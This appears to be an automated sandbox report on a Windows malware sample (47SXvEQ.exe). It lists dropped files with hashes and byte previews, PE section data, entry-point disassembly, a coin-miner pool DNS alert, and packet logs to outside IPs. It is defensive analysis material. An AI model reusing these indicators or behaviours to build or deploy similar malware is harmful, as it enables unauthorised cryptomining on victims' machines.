                                                            SHA1:6049CF7BDE1D7B5E188D1BD8962A9FC28B745C05
                                                            SHA-256:931D79F8A4D470B4D5EFAF50B33F0E2E8602822C53F9759876ED889A8B5F714E
                                                            SHA-512:0F0E1A62BB33876782085A95FFEBDDCD623B9C4AD9B1C6463B26B74B27263FAE10FEF6B8ADB49209851C6CF7FB494B65D6D9B23AA246765DEC52226152ACAA1C
                                                            Malicious:true
                                                            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\sywb4geu\sywb4geu.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\sywb4geu\sywb4geu.0.cs"
                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):4096
                                                            Entropy (8bit):3.1562016616369992
                                                            Encrypted:false
                                                            SSDEEP:48:6Tq7oEAtf0KhzBU/If6mtJn3N0kpW1ulca3Qq:aNz0HmP3OiqK
                                                            MD5:E0EF9E9B62C86D030DD1814A6BAA0264
                                                            SHA1:5090484471FAE6E536EE935EFC1E612CCBFD278F
                                                            SHA-256:76100819C394BCF1092D3AC27EBD96DF8FA3C12D7D2B57C0ED262754BB563C96
                                                            SHA-512:4E9ADA3A0BEDF8BE73651F362010AEDB7591C51F8619001BE68BB27589143F343ECECFF7344A976249CE70D9785E98ADEF53938A6476769415A74E0540C61935
                                                            Malicious:false
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....}g...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (708), with CRLF, CR line terminators
                                                            Category:modified
                                                            Size (bytes):1149
                                                            Entropy (8bit):5.490080645924157
                                                            Encrypted:false
                                                            SSDEEP:24:KJfAOId3ka6KOkqeFkOfNEif8Kax5DqBVKVrdFAMBJTH:uXkka6NkqeFkyNEu8K2DcVKdBJj
                                                            MD5:45E4E9FE7F11D2866F2DCADEEB157058
                                                            SHA1:FB0082ABECA375F00BDEDD6C0EFB02D9EF7D3057
                                                            SHA-256:689AA496831D297809733D1E741AB93CB55BECE0B44C2A7468C90769334ADC4A
                                                            SHA-512:0EFFB0312F161234EBC0CD614F7EAE938D93DDE19DDD22D889C81F19182D9430A3BA28DBD39A2DDE3617EE38D28AD79C232D113A6419E2610326CE425B9272D5
                                                            Malicious:false
                                                            Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\sywb4geu\sywb4geu.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\sywb4geu\sywb4geu.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longe
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):64
                                                            Entropy (8bit):1.1510207563435464
                                                            Encrypted:false
                                                            SSDEEP:3:Nlllul2lllllZ:NllUClll
                                                            MD5:4D98AF7F487E62A9C1D44B02674BAB7E
                                                            SHA1:1B492B2208949EB7F18C32F309C296B4258DBA65
                                                            SHA-256:1E3ED9CE6343DA27C6759A0F05D6DD0B92B3A9C63B6492A2DA4E4F371D9F56DA
                                                            SHA-512:60EC859B84836E865E767FE858E70ACEC6F0FB8077B2E51D6CB4095533433B791C9A16396D69279C7F896DF003A1ED6656087B43EFA16523DA4026317CBB49E6
                                                            Malicious:false
                                                            Preview:@...e.................................:..............@..........
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\ProgramData\Microsoft\svchost.exe
                                                            File Type:PE32+ executable (native) x86-64, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):14544
                                                            Entropy (8bit):6.2660301556221185
                                                            Encrypted:false
                                                            SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                            MD5:0C0195C48B6B8582FA6F6373032118DA
                                                            SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                            SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                            SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 5%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                            Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):97
                                                            Entropy (8bit):4.331807756485642
                                                            Encrypted:false
                                                            SSDEEP:3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
                                                            MD5:195D02DA13D597A52F848A9B28D871F6
                                                            SHA1:D048766A802C61655B9689E953103236EACCB1C7
                                                            SHA-256:ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
                                                            SHA-512:1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
                                                            Malicious:false
                                                            Preview:..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...
                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Entropy (8bit):7.993919118990983
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • VXD Driver (31/22) 0.00%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:47SXvEQ.exe
                                                            File size:13'090'304 bytes
                                                            MD5:ce5152d5376f6ad0c918fb893248dd08
                                                            SHA1:9d5c6c34c29396d141f4df77166e522d57aca6e3
                                                            SHA256:e3dbee51df9dd78d9b3d643f7d7f9c7cb84b88819647d436f1a595d7c1a51e87
                                                            SHA512:10763c455273fe518dc67f3ca424e2a38d4c997275960d393ed40b11926ee47aff268ae46bdeac4b90c6731828fe78e6fb5a881a4e05f9b4d1a9320bd9769198
                                                            SSDEEP:196608:kDmyd0mQb9Y/2Gq/3jk4oYzDL7HODZa8aGid5+5cjwtJ0M+u6yvxXx5GiESF4wj:k//q942X44oYTLwatd5m0g6C1x5Ma
                                                            TLSH:C0D6334FB4954172F829BDBE946B643BA8C6F02CEE9057508CC5CB487184FF82A1F65B
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Q..................................... ....@.......................... ......\......................................
                                                            Icon Hash:90cececece8e8eb0
                                                            Entrypoint:0x132f000
                                                            Entrypoint Section:.taggant
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                            DLL Characteristics:
                                                            Time Stamp:0x51BC99EC [Sat Jun 15 16:44:28 2013 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                            Instruction
                                                            jmp 00007F87BCB036FAh
                                                            setl bh
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add cl, ch
                                                            add byte ptr [eax], ah
                                                            add byte ptr [eax], al
                                                            inc ecx
                                                            push bx
                                                            dec esi
                                                            dec ebp
                                                            das
                                                            xor al, 36h
                                                            dec edi
                                                            bound ecx, dword ptr [ecx+4Ah]
                                                            dec edx
                                                            insd
                                                            push edi
                                                            dec eax
                                                            dec eax
                                                            jbe 00007F87BCB03762h
                                                            push esi
                                                            dec edx
                                                            popad
                                                            je 00007F87BCB0375Bh
                                                            push edx
                                                            dec esi
                                                            jc 00007F87BCB0376Ah
                                                            cmp byte ptr [ebx], dh
                                                            push edx
                                                            jns 00007F87BCB03737h
                                                            or eax, 49674B0Ah
                                                            cmp byte ptr [edi+43h], dl
                                                            jnc 00007F87BCB0373Dh
                                                            bound eax, dword ptr [ecx+30h]
                                                            pop edx
                                                            inc edi
                                                            push esp
                                                            push 43473163h
                                                            aaa
                                                            push edi
                                                            dec esi
                                                            xor ebp, dword ptr [ebx+59h]
                                                            push edi
                                                            push edx
                                                            pop eax
                                                            je 00007F87BCB03747h
                                                            xor dl, byte ptr [ebx+2Bh]
                                                            popad
                                                            jne 00007F87BCB0373Ch
                                                            dec eax
                                                            dec ebp
                                                            jo 00007F87BCB03733h
                                                            xor dword ptr [edi], esi
                                                            inc esp
                                                            dec edx
                                                            dec ebp
                                                            jns 00007F87BCB03740h
                                                            insd
                                                            jnc 00007F87BCB03760h
                                                            aaa
                                                            inc esp
                                                            inc ecx
                                                            inc ebx
                                                            xor dl, byte ptr [ecx+4Bh]
                                                            inc edx
                                                            inc esp
                                                            bound esi, dword ptr [ebx]
                                                            or eax, 63656B0Ah
                                                            jno 00007F87BCB03748h
                                                            push edx
                                                            insb
                                                            js 00007F87BCB03761h
                                                            outsb
                                                            inc ecx
                                                            jno 00007F87BCB03742h
                                                            push ebp
                                                            inc esi
                                                            pop edx
                                                            xor eax, dword ptr [ebx+36h]
                                                            push eax
                                                            aaa
                                                            imul edx, dword ptr [ebx+58h], 4Eh
                                                            aaa
                                                            inc ebx
                                                            jbe 00007F87BCB0373Ch
                                                            dec ebx
                                                            js 00007F87BCB03733h
                                                            jne 00007F87BCB03721h
                                                            push esp
                                                            inc bp
                                                            outsb
                                                            inc edx
                                                            popad
                                                            dec ebx
                                                            insd
                                                            dec ebp
                                                            inc edi
                                                            xor dword ptr [ecx+36h], esp
                                                            push 0000004Bh
                                                            sub eax, dword ptr [ebp+33h]
                                                            jp 00007F87BCB0374Ch
                                                            dec edx
                                                            xor bh, byte ptr [edx+56h]
                                                            bound eax, dword ptr [edi+66h]
                                                            jbe 00007F87BCB0372Ah
                                                            dec eax
                                                            or eax, 506C720Ah
                                                            aaa
                                                            xor dword ptr fs:[ebp+62h], ecx
                                                            arpl word ptr [esi], si
                                                            inc esp
                                                            jo 00007F87BCB03763h
                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xae205b0x6f.idata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x110000xad00b0.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            0x10000x100000x800602645d3e322414f3b6784c7b5a384abFalse0.94482421875data7.694717025001675IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc0x110000xad00b00xad020052c01c796dd21da9bc7e2021436e514cunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .idata 0xae20000x10000x20087632fadcd7bef3f7cd73d2c9bdb3a29False0.158203125data1.0787392978456434IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            0xae30000x2a30000x2000227d5f17274a0c181e2694b78155ee6unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            ypfntliq0xd860000x1a80000x1a7a00ca967508e36f7f3b5db3fab06cbece0bFalse0.9943648107848923data7.952151955456021IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            furbksed0xf2e0000x10000x400ba5f188ed7f72cf3f1014b15450b5347False0.76171875data6.064338778770932IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .taggant0xf2f0000x30000x2200e7f754db6a1cf6c0c68a0955e0d456c1False0.3460477941176471DOS executable (COM)3.8444426245905663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            IMAGE0x111540x42dataEnglishUnited States0.8939393939393939
                                                            RT_RCDATA0x111980x4ea47edata0.9982805252075195
                                                            RT_RCDATA0x4fb6180x5e57a9data0.9994783401489258
                                                            RT_RCDATA0xae0dc40x94data0.8918918918918919
                                                            RT_MANIFEST0xf2d7300x256ASCII text, with CRLF line terminators0.5100334448160535
                                                            DLLImport
                                                            kernel32.dlllstrcpy
                                                            Language of compilation systemCountry where language is spokenMap
                                                            EnglishUnited States
                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2025-01-07T21:01:26.329826+01002036289ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)2192.168.2.4517161.1.1.153UDP
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Jan 7, 2025 21:01:12.711169004 CET4973180192.168.2.4208.95.112.1
                                                            Jan 7, 2025 21:01:12.716043949 CET8049731208.95.112.1192.168.2.4
                                                            Jan 7, 2025 21:01:12.716113091 CET4973180192.168.2.4208.95.112.1
                                                            Jan 7, 2025 21:01:12.716286898 CET4973180192.168.2.4208.95.112.1
                                                            Jan 7, 2025 21:01:12.721008062 CET8049731208.95.112.1192.168.2.4
                                                            Jan 7, 2025 21:01:14.063399076 CET8049731208.95.112.1192.168.2.4
                                                            Jan 7, 2025 21:01:14.064259052 CET4973180192.168.2.4208.95.112.1
                                                            Jan 7, 2025 21:01:14.065095901 CET8049731208.95.112.1192.168.2.4
                                                            Jan 7, 2025 21:01:14.065144062 CET8049731208.95.112.1192.168.2.4
                                                            Jan 7, 2025 21:01:14.065186977 CET4973180192.168.2.4208.95.112.1
                                                            Jan 7, 2025 21:01:14.065186977 CET4973180192.168.2.4208.95.112.1
                                                            Jan 7, 2025 21:01:14.065264940 CET8049731208.95.112.1192.168.2.4
                                                            Jan 7, 2025 21:01:14.065327883 CET4973180192.168.2.4208.95.112.1
                                                            Jan 7, 2025 21:01:14.069247007 CET8049731208.95.112.1192.168.2.4
                                                            Jan 7, 2025 21:01:14.069310904 CET4973180192.168.2.4208.95.112.1
                                                            Jan 7, 2025 21:01:41.004973888 CET4974080192.168.2.4208.95.112.1
                                                            Jan 7, 2025 21:01:41.009830952 CET8049740208.95.112.1192.168.2.4
                                                            Jan 7, 2025 21:01:41.009938002 CET4974080192.168.2.4208.95.112.1
                                                            Jan 7, 2025 21:01:41.010040045 CET4974080192.168.2.4208.95.112.1
                                                            Jan 7, 2025 21:01:41.014976978 CET8049740208.95.112.1192.168.2.4
                                                            Jan 7, 2025 21:01:41.501972914 CET8049740208.95.112.1192.168.2.4
                                                            Jan 7, 2025 21:01:41.645839930 CET4974080192.168.2.4208.95.112.1
                                                            Jan 7, 2025 21:01:41.784370899 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:41.784404993 CET44349741162.159.135.232192.168.2.4
                                                            Jan 7, 2025 21:01:41.784476042 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:41.808167934 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:41.808183908 CET44349741162.159.135.232192.168.2.4
                                                            Jan 7, 2025 21:01:42.282752991 CET44349741162.159.135.232192.168.2.4
                                                            Jan 7, 2025 21:01:42.287856102 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.287878036 CET44349741162.159.135.232192.168.2.4
                                                            Jan 7, 2025 21:01:42.288856983 CET44349741162.159.135.232192.168.2.4
                                                            Jan 7, 2025 21:01:42.288918018 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.295824051 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.295891047 CET44349741162.159.135.232192.168.2.4
                                                            Jan 7, 2025 21:01:42.296099901 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.299624920 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.299644947 CET44349741162.159.135.232192.168.2.4
                                                            Jan 7, 2025 21:01:42.300195932 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.300220966 CET44349741162.159.135.232192.168.2.4
                                                            Jan 7, 2025 21:01:42.300409079 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.300441027 CET44349741162.159.135.232192.168.2.4
                                                            Jan 7, 2025 21:01:42.303929090 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.303947926 CET44349741162.159.135.232192.168.2.4
                                                            Jan 7, 2025 21:01:42.303967953 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.303975105 CET44349741162.159.135.232192.168.2.4
                                                            Jan 7, 2025 21:01:42.304052114 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.304059029 CET44349741162.159.135.232192.168.2.4
                                                            Jan 7, 2025 21:01:42.304080963 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.304090977 CET44349741162.159.135.232192.168.2.4
                                                            Jan 7, 2025 21:01:42.304109097 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.304121017 CET44349741162.159.135.232192.168.2.4
                                                            Jan 7, 2025 21:01:42.304145098 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.304145098 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.304163933 CET44349741162.159.135.232192.168.2.4
                                                            Jan 7, 2025 21:01:42.304198980 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.304209948 CET44349741162.159.135.232192.168.2.4
                                                            Jan 7, 2025 21:01:42.304227114 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.304234028 CET44349741162.159.135.232192.168.2.4
                                                            Jan 7, 2025 21:01:42.304253101 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.304263115 CET44349741162.159.135.232192.168.2.4
                                                            Jan 7, 2025 21:01:42.304284096 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.304302931 CET44349741162.159.135.232192.168.2.4
                                                            Jan 7, 2025 21:01:42.304321051 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.304330111 CET44349741162.159.135.232192.168.2.4
                                                            Jan 7, 2025 21:01:42.307795048 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.307806969 CET44349741162.159.135.232192.168.2.4
                                                            Jan 7, 2025 21:01:42.307913065 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.307919979 CET44349741162.159.135.232192.168.2.4
                                                            Jan 7, 2025 21:01:42.307933092 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.307939053 CET44349741162.159.135.232192.168.2.4
                                                            Jan 7, 2025 21:01:42.307955027 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.307966948 CET44349741162.159.135.232192.168.2.4
                                                            Jan 7, 2025 21:01:42.308020115 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.308027983 CET44349741162.159.135.232192.168.2.4
                                                            Jan 7, 2025 21:01:42.308041096 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.308059931 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.308109045 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.308123112 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.308142900 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.308196068 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.308207989 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.308222055 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.308259010 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.308322906 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.313420057 CET44349741162.159.135.232192.168.2.4
                                                            Jan 7, 2025 21:01:42.316371918 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.316382885 CET44349741162.159.135.232192.168.2.4
                                                            Jan 7, 2025 21:01:42.316401958 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.316420078 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.316431999 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.316482067 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.320194006 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.320209026 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.320261955 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.320288897 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.320302010 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.320369005 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.320521116 CET44349741162.159.135.232192.168.2.4
                                                            Jan 7, 2025 21:01:42.320628881 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.320636988 CET44349741162.159.135.232192.168.2.4
                                                            Jan 7, 2025 21:01:42.320652008 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.320662022 CET44349741162.159.135.232192.168.2.4
                                                            Jan 7, 2025 21:01:42.324187040 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.324198961 CET44349741162.159.135.232192.168.2.4
                                                            Jan 7, 2025 21:01:42.324259996 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:42.326682091 CET44349741162.159.135.232192.168.2.4
                                                            Jan 7, 2025 21:01:43.116036892 CET44349741162.159.135.232192.168.2.4
                                                            Jan 7, 2025 21:01:43.116113901 CET44349741162.159.135.232192.168.2.4
                                                            Jan 7, 2025 21:01:43.116144896 CET44349741162.159.135.232192.168.2.4
